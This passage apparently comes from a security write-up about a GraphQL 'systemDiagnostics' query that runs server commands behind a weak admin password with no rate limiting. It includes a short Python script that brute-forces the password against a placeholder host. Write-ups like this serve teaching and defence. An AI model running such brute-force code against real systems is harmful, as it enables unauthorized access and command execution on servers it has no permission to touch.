The query systemDiagnostics is an administrative functionality that allows running a subset of system
commands on the server. The query is governed by a username and password before processing the
command.
The password is weak, and the server has no rate limiting protections. This allows attackers to easily conduct brute
force attacks against the server.
# Brute Force attack with a list of passwords:
passwordlist = ['admin123', 'pass123', 'adminadmin', '123']
for password in passwordlist:
resp = requests.post('http://host/graphql',
json = {
"query":"query {\n systemDiagnostics(username:\"admin\", password:\"{}\", cmd:\"ls\")\n}".format(password),
"variables":None
})
if not 'errors' in resp.text:
print('Password is', password)